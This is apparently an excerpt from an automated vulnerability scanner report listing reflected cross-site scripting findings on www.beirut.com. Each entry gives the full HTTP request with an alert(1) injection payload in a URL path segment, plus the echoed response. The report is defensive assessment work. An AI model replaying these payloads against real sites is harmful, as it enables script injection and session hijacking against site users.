GET /Shopping/Consumer-Goods/235690923/Luggage566a8'-alert(1)-'2f530c60795/41 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:54:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Consumer-Goods/235690923/Luggage566a8'-alert(1)-'2f530c60795/41';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.896. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Luggage/41 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Luggage/41

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6406'-alert(1)-'ecdd14a7de1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923/Luggage/41a6406'-alert(1)-'ecdd14a7de1 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:00:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Consumer-Goods/235690923/Luggage/41a6406'-alert(1)-'ecdd14a7de1';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.897. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Party-Supplies/25 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Party-Supplies/25

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85d3c"><a>ef19b500a40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping85d3c"><a>ef19b500a40/Consumer-Goods/235690923/Party-Supplies/25 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:40:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping85d3c"><a>ef19b500a40">
...[SNIP]...

4.898. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Party-Supplies/25 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Party-Supplies/25

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b7d6'-alert(1)-'9921276be78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping5b7d6'-alert(1)-'9921276be78/Consumer-Goods/235690923/Party-Supplies/25 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:48:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping5b7d6'-alert(1)-'9921276be78/Consumer-Goods/235690923/Party-Supplies/25';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.899. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Party-Supplies/25 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Party-Supplies/25

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e65e'-alert(1)-'6c866c85290 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods9e65e'-alert(1)-'6c866c85290/235690923/Party-Supplies/25 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:53:02 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Consumer-Goods9e65e'-alert(1)-'6c866c85290/235690923/Party-Supplies/25';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.900. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Party-Supplies/25 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Party-Supplies/25

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a2a9<script>alert(1)</script>c9760d71641 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Consumer-Goods4a2a9<script>alert(1)</script>c9760d71641/235690923/Party-Supplies/25 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:53:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56595

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Consumer Goods4a2a9<script>alert(1)</script>c9760d71641 <a href="#" id="backlink">
...[SNIP]...

4.901. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Party-Supplies/25 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Party-Supplies/25

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8faed'-alert(1)-'15ea2e93166 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/2356909238faed'-alert(1)-'15ea2e93166/Party-Supplies/25 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:57:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Consumer-Goods/2356909238faed'-alert(1)-'15ea2e93166/Party-Supplies/25';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.902. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Party-Supplies/25 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Party-Supplies/25

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e0ff'-alert(1)-'6fcc3fca66c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923/Party-Supplies6e0ff'-alert(1)-'6fcc3fca66c/25 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:03:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Consumer-Goods/235690923/Party-Supplies6e0ff'-alert(1)-'6fcc3fca66c/25';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.903. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Party-Supplies/25 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Party-Supplies/25

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87eb4'-alert(1)-'3ee8c160343 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923/Party-Supplies/2587eb4'-alert(1)-'3ee8c160343 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:07:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Consumer-Goods/235690923/Party-Supplies/2587eb4'-alert(1)-'3ee8c160343';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.904. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Pet-Store/71 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Pet-Store/71

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0694'-alert(1)-'b7e2746b028 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shoppinge0694'-alert(1)-'b7e2746b028/Consumer-Goods/235690923/Pet-Store/71 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:25:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shoppinge0694'-alert(1)-'b7e2746b028/Consumer-Goods/235690923/Pet-Store/71';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.905. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Pet-Store/71 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Pet-Store/71

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d5a6"><a>c9df6134960 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping1d5a6"><a>c9df6134960/Consumer-Goods/235690923/Pet-Store/71 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:17:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping1d5a6"><a>c9df6134960">
...[SNIP]...

4.906. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Pet-Store/71 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Pet-Store/71

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8100'-alert(1)-'64d0a0677ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goodsb8100'-alert(1)-'64d0a0677ca/235690923/Pet-Store/71 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:29:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Consumer-Goodsb8100'-alert(1)-'64d0a0677ca/235690923/Pet-Store/71';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.907. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Pet-Store/71 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Pet-Store/71

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e011a<script>alert(1)</script>ffc19d6a723 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Consumer-Goodse011a<script>alert(1)</script>ffc19d6a723/235690923/Pet-Store/71 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:30:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55552

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Consumer Goodse011a<script>alert(1)</script>ffc19d6a723 <a href="#" id="backlink">
...[SNIP]...

4.908. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Pet-Store/71 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Pet-Store/71

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ea0c'-alert(1)-'db07250d556 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

